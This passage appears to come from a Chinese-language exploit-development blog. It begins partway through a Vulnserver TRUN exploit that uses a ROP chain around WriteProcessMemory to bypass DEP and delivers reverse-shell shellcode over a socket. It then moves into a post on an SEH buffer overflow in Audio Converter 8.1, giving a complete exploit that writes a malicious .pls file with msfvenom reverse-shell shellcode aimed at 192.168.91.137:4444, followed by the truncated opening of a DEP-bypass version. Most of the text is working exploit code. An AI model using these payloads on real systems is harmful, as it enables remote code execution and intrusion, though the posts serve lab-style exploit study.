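    shellcode += b"\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
    shellcode += b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"
    shellcode += b"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
    shellcode += b"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
    shellcode += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff"
    shellcode += b"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
    shellcode += b"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40"
    shellcode += b"\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97"
    shellcode += b"\x6a\x05\x68\xc0\xa8\x5b\x89\x68\x02\x00\x11"
    shellcode += b"\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74"
    shellcode += b"\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75"
    shellcode += b"\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d"
    shellcode += b"\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12"
    shellcode += b"\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
    shellcode += b"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"
    shellcode += b"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc"
    shellcode += b"\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
    shellcode += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a"
    shellcode += b"\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
    shellcode += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f"
    shellcode += b"\x6a\x00\x53\xff\xd5"

    pos = mapBadChars(shellcode)
    print(pos)
    encodedRevShell = encodeShellcode(shellcode)

    # WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten)
    # call skeleton.  The 0x45454545 / 0x41414141 placeholders are patched by rop1
    # at run time; everything else is static.
    func = struct.pack("<L", 0x45454545)   # WriteProcessMemory Address (patched)
    func += struct.pack("<L", 0x62501c10)  # Shellcode Return Address (code cave)
    func += struct.pack("<L", 0xFFFFFFFF)  # pseudo Process handle
    func += struct.pack("<L", 0x62501c10)  # Code cave address
    func += struct.pack("<L", 0x41414141)  # dummy lpBuffer (stack address, patched)
    func += struct.pack("<L", 0x41414141)  # dummy nSize (patched)
    func += struct.pack("<L", 0x62502028)  # lpNumberOfBytesWritten

    eip = struct.pack("<L", 0x62501022)    # retn essfunc.dll

    # Snapshot ESP (address of the next gadget, i.e. skeleton + 36) into ESI, EDX, EAX.
    rop1 = struct.pack("<L", 0x755912d6)   # PUSH ESP # POP ESI # RETN
    rop1 += struct.pack("<L", 0x755b671f)  # MOV EDX,ESI # POP ESI # RETN 0x04
    rop1 += struct.pack("<L", 0x41414141)  # junk
    rop1 += struct.pack("<L", 0x7728bdf4)  # MOV EAX,EDX # POP ESI # RETN
    rop1 += struct.pack("<L", 0x41414141)  # junk
    rop1 += struct.pack("<L", 0x41414141)  # junk

    # Patching dummy lpBuffer: ECX = ESP snapshot + (0x88888888 + 0x7777798c mod 2^32 = 0x214),
    # i.e. the start of the NOP sled; written into the lpBuffer slot.
    rop1 += struct.pack("<L", 0x758cc157)  # POP ECX # RETN
    rop1 += struct.pack("<L", 0x88888888)  # 0x88888888
    rop1 += struct.pack("<L", 0x75515163)  # ADD EAX,ECX # RETN
    rop1 += struct.pack("<L", 0x758cc157)  # POP ECX # RETN
    rop1 += struct.pack("<L", 0x7777798c)  # 0x7777798c
    rop1 += struct.pack("<L", 0x75515163)  # ADD EAX,ECX # RETN
    rop1 += struct.pack("<L", 0x772a9052)  # XCHG EAX,ECX # RETN
    rop1 += struct.pack("<L", 0x758fe636)  # MOV EAX,EDX # RETN
    rop1 += struct.pack("<L", 0x772f4302)  # SUB EAX,16 # RETN   (0x16: snapshot+36 -> skeleton+14)
    rop1 += struct.pack("<L", 0x749f4480)  # INC EAX # RETN
    rop1 += struct.pack("<L", 0x749f4480)  # INC EAX # RETN      -> skeleton+16 = lpBuffer slot
    rop1 += struct.pack("<L", 0x754e2d6d)  # MOV DWORD PTR [EAX],ECX # RETN

    # Patching dummy nSize: NEG(0xfffffdf4) = 0x20c bytes, written into skeleton+20.
    rop1 += struct.pack("<L", 0x74a01e84)  # INC EAX # RETN
    rop1 += struct.pack("<L", 0x74a01e84)  # INC EAX # RETN
    rop1 += struct.pack("<L", 0x74a01e84)  # INC EAX # RETN
    rop1 += struct.pack("<L", 0x74a01e84)  # INC EAX # RETN
    rop1 += struct.pack("<L", 0x772a5a6f)  # POP ECX # RETN
    rop1 += struct.pack("<L", 0xfffffdf4)  # 0xfffffdf4
    rop1 += struct.pack("<L", 0x772a9052)  # XCHG EAX,ECX # RETN
    rop1 += struct.pack("<L", 0x758f15ce)  # NEG EAX # RETN
    rop1 += struct.pack("<L", 0x772a9052)  # XCHG EAX,ECX # RETN
    rop1 += struct.pack("<L", 0x754e2d6d)  # MOV DWORD PTR [EAX],ECX # RETN

    # Patching WriteProcessMemory Address: read the AddAtomA pointer from the
    # essfunc.dll IAT, add the fixed kernel32 delta (NEG 0xfffd9df0 = 0x26210)
    # and store the result into skeleton+0.
    rop1 += struct.pack("<L", 0x772f4302)  # SUB EAX,16 # RETN
    rop1 += struct.pack("<L", 0x74a01e84)  # INC EAX # RETN
    rop1 += struct.pack("<L", 0x74a01e84)  # INC EAX # RETN      -> skeleton+0
    rop1 += struct.pack("<L", 0x76068122)  # XCHG EAX,EDI # RETN
    rop1 += struct.pack("<L", 0x758cc157)  # POP ECX # RETN
    rop1 += struct.pack("<L", 0x62506090)  # IAT 62506090 AddAtomA KERNEL32
    rop1 += struct.pack("<L", 0x75fd7518)  # XCHG EAX,DWORD PTR [ECX] # RETN
    rop1 += struct.pack("<L", 0x772a9052)  # XCHG EAX,ECX # RETN
    rop1 += struct.pack("<L", 0x7557771b)  # POP EAX # RETN
    rop1 += struct.pack("<L", 0xfffd9df0)  # 0xfffd9df0
    rop1 += struct.pack("<L", 0x758f15ce)  # NEG EAX # RETN
    rop1 += struct.pack("<L", 0x75515163)  # ADD EAX,ECX # RETN
    rop1 += struct.pack("<L", 0x772a9052)  # XCHG EAX,ECX # RETN
    rop1 += struct.pack("<L", 0x76068122)  # XCHG EAX,EDI # RETN
    rop1 += struct.pack("<L", 0x754e2d6d)  # MOV DWORD PTR [EAX],ECX # RETN

    # Copy the skeleton address (EAX) into ESI; EAX itself is left unchanged.
    # (The gadget pair is XCHG then MOV back - the destination is ESI, not EBX.)
    rop1 += struct.pack("<L", 0x7730e63c)  # XCHG EAX,ESI # RETN
    rop1 += struct.pack("<L", 0x75f84c67)  # MOV EAX,ESI # RETN

    # Align EAX with shellcode: EAX = skeleton + 648 (SUB of -648).  648 is
    # hard-coded and equals len(func) + len(eip) + len(rop1) + len(NOP sled);
    # it is verified below after rop1 is complete.
    rop1 += struct.pack("<L", 0x772a5a6f)  # POP ECX # RETN
    rop1 += struct.pack("<L", 0xfffffd78)  # 0n648
    rop1 += struct.pack("<L", 0x772974e4)  # SUB EAX,ECX # RETN ** [ntdll.dll] **

    rop1 += decodeShellcode(0, pos, shellcode)

    # Align ESP with ROP skeleton: ESP = saved skeleton address, so the final
    # RETN pops the patched WriteProcessMemory address and the call is made.
    rop1 += struct.pack("<L", 0x7730e63c)  # XCHG EAX,ESI # RETN
    rop1 += struct.pack("<L", 0x749f2002)  # XCHG EAX,ESP # RETN

    nops = b"\x90" * 80

    # Both hard-coded distances depend on the length of rop1, which grows by
    # 24 bytes per bad byte in the shellcode.  Refuse to send a payload whose
    # decoder and WriteProcessMemory source would be misaligned.
    shellcodeOff = len(func) + len(eip) + len(rop1) + len(nops)
    assert shellcodeOff == 648, (
        "EAX alignment constant (648) no longer matches the shellcode offset (%d); "
        "recompute 0xfffffd78 after changing rop1, the NOP sled or the shellcode" % shellcodeOff)
    sledOff = len(func) + len(eip) + len(rop1)
    assert sledOff - 36 == (0x88888888 + 0x7777798c) & 0xffffffff, (
        "lpBuffer constant no longer points at the NOP sled (offset %d)" % sledOff)

    # padding = b"C" * (3000-2006-32-len(rop1)-len(shellcode))
    padding = b"\x44" * 1000

    PAYLOAD = (
        b'TRUN .' +
        b'A' * (2006 - len(func)) +
        func +
        eip +
        rop1 +
        nops +
        encodedRevShell +
        padding
    )
    _checkNoBadChars(PAYLOAD, "payload")

    with socket.create_connection((HOST, PORT)) as fd:
        fd.sendall(PAYLOAD)


if __name__ == "__main__":
    main()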
<p>喜闻乐见的反弹<code>shell</code>如下:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/21.png" alt="BOF"></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/">
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/" class="post-title-link" itemprop="url">Audio Converter 8.1 - SEH Stack Buffer Overflow:DEP and ASLR bypass</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-05-11 23:06:13" itemprop="dateCreated datePublished" datetime="2022-05-11T23:06:13Z">2022-05-11</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2022-05-14 13:49:02" itemprop="dateModified" datetime="2022-05-14T13:49:02Z">2022-05-14</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Windows-Exploitation/" itemprop="url" rel="index"><span itemprop="name">Windows Exploitation</span></a>
</span>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>本次讨论的<code>Audio Converter 8.1</code>在<code>Win7 SP1 6.1.7601</code>和<code>Win10 10.0.19044</code>两者之间有一些不同,在<code>Win7</code>下漏洞能够利用成功,在<code>Win10</code>下会出现<code>SEH Handler</code>无法捕捉到异常,导致漏洞执行失败。</p>
<p>先来看<code>Win7</code>下的漏洞利用:之前遇到的<code>SEH</code>栈溢出漏洞,覆盖的都是<code>SEH</code>链的第一个<code>NSEH</code>和<code>SEH Handler</code>,而这里覆盖的是第二个<code>NSEH</code>和<code>SEH Handler</code>。简单的部分就不说了,<code>Win7</code>下<code>Offset</code>为<code>4432</code>(覆盖<code>NSEH</code>的值),坏字符为<code>\x00\x0a</code>(注意:下面 <code>msfvenom</code> 命令里 <code>-b</code> 排除的是 <code>\x00\x3d</code>,与这里并不一致,复现时以自己实际测出的坏字符为准)。</p>
<p>看一下溢出的时候,其实是<code>SEH</code>链第二个节点被覆盖:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/01.png" alt="BOF"></p>
<p>但是,这不影响漏洞利用的方式,还是<code>P/P/R</code>结合<code>JMP</code>,如果当前异常处理函数无法处理异常,则会转到下一个异常处理函数处理,所以覆盖的异常处理函数是可以得到执行的,进而执行写入的<code>shellcode</code>。考虑要<code>bypass ASLR</code>,所以需要找到未开启<code>ASLR</code>的<code>DLL</code>:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/02.png" alt="BOF"></p>
<p><code>win7</code>下没有开启全局<code>DEP</code>时,就是简单的<code>SEH</code> 栈溢出,最终的利用代码如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">filename=<span class="string">"exploit.pls"</span></span><br><span class="line"></span><br><span 
class="line"><span class="comment">#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.91.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00\x3d' </span></span><br><span class="line">shellcode = <span class="string">b""</span></span><br><span class="line">shellcode += <span class="string">b"\xdd\xc6\xd9\x74\x24\xf4\x58\x33\xc9\xbe\xab"</span></span><br><span class="line">shellcode += <span class="string">b"\x77\x29\x71\xb1\x52\x31\x70\x17\x03\x70\x17"</span></span><br><span class="line">shellcode += <span class="string">b"\x83\x43\x8b\xcb\x84\x6f\x9c\x8e\x67\x8f\x5d"</span></span><br><span class="line">shellcode += <span class="string">b"\xef\xee\x6a\x6c\x2f\x94\xff\xdf\x9f\xde\xad"</span></span><br><span class="line">shellcode += <span class="string">b"\xd3\x54\xb2\x45\x67\x18\x1b\x6a\xc0\x97\x7d"</span></span><br><span class="line">shellcode += <span class="string">b"\x45\xd1\x84\xbe\xc4\x51\xd7\x92\x26\x6b\x18"</span></span><br><span class="line">shellcode += <span class="string">b"\xe7\x27\xac\x45\x0a\x75\x65\x01\xb9\x69\x02"</span></span><br><span class="line">shellcode += <span class="string">b"\x5f\x02\x02\x58\x71\x02\xf7\x29\x70\x23\xa6"</span></span><br><span class="line">shellcode += <span class="string">b"\x22\x2b\xe3\x49\xe6\x47\xaa\x51\xeb\x62\x64"</span></span><br><span class="line">shellcode += <span class="string">b"\xea\xdf\x19\x77\x3a\x2e\xe1\xd4\x03\x9e\x10"</span></span><br><span class="line">shellcode += <span class="string">b"\x24\x44\x19\xcb\x53\xbc\x59\x76\x64\x7b\x23"</span></span><br><span class="line">shellcode += <span class="string">b"\xac\xe1\x9f\x83\x27\x51\x7b\x35\xeb\x04\x08"</span></span><br><span class="line">shellcode += <span class="string">b"\x39\x40\x42\x56\x5e\x57\x87\xed\x5a\xdc\x26"</span></span><br><span class="line">shellcode += <span class="string">b"\x21\xeb\xa6\x0c\xe5\xb7\x7d\x2c\xbc\x1d\xd3"</span></span><br><span class="line">shellcode += <span 
class="string">b"\x51\xde\xfd\x8c\xf7\x95\x10\xd8\x85\xf4\x7c"</span></span><br><span class="line">shellcode += <span class="string">b"\x2d\xa4\x06\x7d\x39\xbf\x75\x4f\xe6\x6b\x11"</span></span><br><span class="line">shellcode += <span class="string">b"\xe3\x6f\xb2\xe6\x04\x5a\x02\x78\xfb\x65\x73"</span></span><br><span class="line">shellcode += <span class="string">b"\x51\x38\x31\x23\xc9\xe9\x3a\xa8\x09\x15\xef"</span></span><br><span class="line">shellcode += <span class="string">b"\x7f\x59\xb9\x40\xc0\x09\x79\x31\xa8\x43\x76"</span></span><br><span class="line">shellcode += <span class="string">b"\x6e\xc8\x6c\x5c\x07\x63\x97\x37\xe8\xdc\xcc"</span></span><br><span class="line">shellcode += <span class="string">b"\x4e\x80\x1e\xf2\x41\x0d\x96\x14\x0b\xbd\xfe"</span></span><br><span class="line">shellcode += <span class="string">b"\x8f\xa4\x24\x5b\x5b\x54\xa8\x71\x26\x56\x22"</span></span><br><span class="line">shellcode += <span class="string">b"\x76\xd7\x19\xc3\xf3\xcb\xce\x23\x4e\xb1\x59"</span></span><br><span class="line">shellcode += <span class="string">b"\x3b\x64\xdd\x06\xae\xe3\x1d\x40\xd3\xbb\x4a"</span></span><br><span class="line">shellcode += <span class="string">b"\x05\x25\xb2\x1e\xbb\x1c\x6c\x3c\x46\xf8\x57"</span></span><br><span class="line">shellcode += <span class="string">b"\x84\x9d\x39\x59\x05\x53\x05\x7d\x15\xad\x86"</span></span><br><span class="line">shellcode += <span class="string">b"\x39\x41\x61\xd1\x97\x3f\xc7\x8b\x59\xe9\x91"</span></span><br><span class="line">shellcode += <span class="string">b"\x60\x30\x7d\x67\x4b\x83\xfb\x68\x86\x75\xe3"</span></span><br><span class="line">shellcode += <span class="string">b"\xd9\x7f\xc0\x1c\xd5\x17\xc4\x65\x0b\x88\x2b"</span></span><br><span class="line">shellcode += <span class="string">b"\xbc\x8f\xa8\xc9\x14\xfa\x40\x54\xfd\x47\x0d"</span></span><br><span class="line">shellcode += <span class="string">b"\x67\x28\x8b\x28\xe4\xd8\x74\xcf\xf4\xa9\x71"</span></span><br><span class="line">shellcode += 
<span class="string">b"\x8b\xb2\x42\x08\x84\x56\x64\xbf\xa5\x72"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># badchars: \x00\x3d</span></span><br><span class="line">payload=<span class="string">b"A"</span>*<span class="number">4432</span></span><br><span class="line">payload+=<span class="string">b"\xeb\x06\x90\x90"</span></span><br><span class="line">payload += struct.pack(<span class="string">"<L"</span>,<span class="number">0x1002b51c</span>)</span><br><span class="line">payload+=<span class="string">b"\x90"</span>*<span class="number">16</span></span><br><span class="line">payload+=shellcode</span><br><span class="line">payload+=<span class="string">b"C"</span>*(<span class="number">45544</span>-len(shellcode))</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> open(<span class="string">"exploit.pls"</span>, <span class="string">"wb"</span>) <span class="keyword">as</span> fp:</span><br><span class="line"> fp.write(payload)</span><br></pre></td></tr></table></figure>
<p>成功反弹<code>shell</code>:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/03.png" alt="BOF"></p>
<p>现在开启全局<code>DEP</code>再来看一下。基本步骤不再赘述,只贴几张截图:</p>
<p>利用<code>mona</code>,在每个<code>SEH Handler</code>下断点,这个方法还挺方便的:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/04.png" alt="BOF"></p>
<p>查找<code>ROP Chain</code>在内存的位置:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/05.png" alt="BOF"></p>
<p>执行到触发<code>SEH</code>之后,查看此刻的<code>ESP</code>,得到<code>ESP</code>与<code>ROP Chain</code>之间的距离:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/06.png" alt="BOF"></p>
<p>利用<code>mona</code>寻找跳转大于等于<code>2412</code>的<code>ROP Gadget</code>:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/07.png" alt="BOF"></p>
<p>在生成的<code>stackpivot.txt</code>文件中挑选符合要求的<code>ROP Gadget</code>:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/08.png" alt="BOF"></p>
<p>这里选择<code>0x100646bb</code>作为覆盖<code>SEH</code>的地址。注意该gadget会把栈指针抬高<code>3652</code>个字节,因此需要在<code>ROP Chain</code>前面填充一些<code>\x90</code>,否则会落到<code>ROP Chain</code>内部,导致无法从链首执行。经过多次尝试,需要添加<code>1348</code>个<code>\x90</code>才能精确落在<code>ROP Chain</code>的起始位置。</p>
<p>最终的利用代码如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">total_size = <span class="number">200000</span></span><br><span class="line">filename=<span class="string">"exploit_seh.pls"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.91.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00\x3d' </span></span><br><span class="line">shellcode = <span class="string">b""</span></span><br><span class="line">shellcode += <span class="string">b"\xdd\xc6\xd9\x74\x24\xf4\x58\x33\xc9\xbe\xab"</span></span><br><span class="line">shellcode += <span class="string">b"\x77\x29\x71\xb1\x52\x31\x70\x17\x03\x70\x17"</span></span><br><span 
class="line">shellcode += <span class="string">b"\x83\x43\x8b\xcb\x84\x6f\x9c\x8e\x67\x8f\x5d"</span></span><br><span class="line">shellcode += <span class="string">b"\xef\xee\x6a\x6c\x2f\x94\xff\xdf\x9f\xde\xad"</span></span><br><span class="line">shellcode += <span class="string">b"\xd3\x54\xb2\x45\x67\x18\x1b\x6a\xc0\x97\x7d"</span></span><br><span class="line">shellcode += <span class="string">b"\x45\xd1\x84\xbe\xc4\x51\xd7\x92\x26\x6b\x18"</span></span><br><span class="line">shellcode += <span class="string">b"\xe7\x27\xac\x45\x0a\x75\x65\x01\xb9\x69\x02"</span></span><br><span class="line">shellcode += <span class="string">b"\x5f\x02\x02\x58\x71\x02\xf7\x29\x70\x23\xa6"</span></span><br><span class="line">shellcode += <span class="string">b"\x22\x2b\xe3\x49\xe6\x47\xaa\x51\xeb\x62\x64"</span></span><br><span class="line">shellcode += <span class="string">b"\xea\xdf\x19\x77\x3a\x2e\xe1\xd4\x03\x9e\x10"</span></span><br><span class="line">shellcode += <span class="string">b"\x24\x44\x19\xcb\x53\xbc\x59\x76\x64\x7b\x23"</span></span><br><span class="line">shellcode += <span class="string">b"\xac\xe1\x9f\x83\x27\x51\x7b\x35\xeb\x04\x08"</span></span><br><span class="line">shellcode += <span class="string">b"\x39\x40\x42\x56\x5e\x57\x87\xed\x5a\xdc\x26"</span></span><br><span class="line">shellcode += <span class="string">b"\x21\xeb\xa6\x0c\xe5\xb7\x7d\x2c\xbc\x1d\xd3"</span></span><br><span class="line">shellcode += <span class="string">b"\x51\xde\xfd\x8c\xf7\x95\x10\xd8\x85\xf4\x7c"</span></span><br><span class="line">shellcode += <span class="string">b"\x2d\xa4\x06\x7d\x39\xbf\x75\x4f\xe6\x6b\x11"</span></span><br><span class="line">shellcode += <span class="string">b"\xe3\x6f\xb2\xe6\x04\x5a\x02\x78\xfb\x65\x73"</span></span><br><span class="line">shellcode += <span class="string">b"\x51\x38\x31\x23\xc9\xe9\x3a\xa8\x09\x15\xef"</span></span><br><span class="line">shellcode += <span 
class="string">b"\x7f\x59\xb9\x40\xc0\x09\x79\x31\xa8\x43\x76"</span></span><br><span class="line">shellcode += <span class="string">b"\x6e\xc8\x6c\x5c\x07\x63\x97\x37\xe8\xdc\xcc"</span></span><br><span class="line">shellcode += <span class="string">b"\x4e\x80\x1e\xf2\x41\x0d\x96\x14\x0b\xbd\xfe"</span></span><br><span class="line">shellcode += <span class="string">b"\x8f\xa4\x24\x5b\x5b\x54\xa8\x71\x26\x56\x22"</span></span><br><span class="line">shellcode += <span class="string">b"\x76\xd7\x19\xc3\xf3\xcb\xce\x23\x4e\xb1\x59"</span></span><br><span class="line">shellcode += <span class="string">b"\x3b\x64\xdd\x06\xae\xe3\x1d\x40\xd3\xbb\x4a"</span></span><br><span class="line">shellcode += <span class="string">b"\x05\x25\xb2\x1e\xbb\x1c\x6c\x3c\x46\xf8\x57"</span></span><br><span class="line">shellcode += <span class="string">b"\x84\x9d\x39\x59\x05\x53\x05\x7d\x15\xad\x86"</span></span><br><span class="line">shellcode += <span class="string">b"\x39\x41\x61\xd1\x97\x3f\xc7\x8b\x59\xe9\x91"</span></span><br><span class="line">shellcode += <span class="string">b"\x60\x30\x7d\x67\x4b\x83\xfb\x68\x86\x75\xe3"</span></span><br><span class="line">shellcode += <span class="string">b"\xd9\x7f\xc0\x1c\xd5\x17\xc4\x65\x0b\x88\x2b"</span></span><br><span class="line">shellcode += <span class="string">b"\xbc\x8f\xa8\xc9\x14\xfa\x40\x54\xfd\x47\x0d"</span></span><br><span class="line">shellcode += <span class="string">b"\x67\x28\x8b\x28\xe4\xd8\x74\xcf\xf4\xa9\x71"</span></span><br><span class="line">shellcode += <span class="string">b"\x8b\xb2\x42\x08\x84\x56\x64\xbf\xa5\x72"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line"> <span 
class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets = [</span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebp:---]</span></span><br><span class="line"> <span class="number">0x10070b5f</span>, <span class="comment"># POP EBP # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x10070b5f</span>, <span class="comment"># skip 4 bytes [audconv.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebx:---]</span></span><br><span class="line"> <span class="number">0x1006c128</span>, <span class="comment"># POP EBX # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x00000001</span>, <span class="comment"># 0x00000001-> ebx</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edx:---]</span></span><br><span class="line"> <span class="number">0x10082d43</span>, <span class="comment"># POP EDX # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x00001000</span>, <span class="comment"># 0x00001000-> edx</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ecx:---]</span></span><br><span class="line"> <span class="number">0x10073e81</span>, <span class="comment"># POP ECX # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x00000040</span>, <span class="comment"># 0x00000040-> ecx</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edi:---]</span></span><br><span class="line"> <span class="number">0x100147d2</span>, <span class="comment"># POP EDI # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x1003f2b9</span>, <span class="comment"># RETN (ROP NOP) [audconv.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_esi:---]</span></span><br><span class="line"> <span 
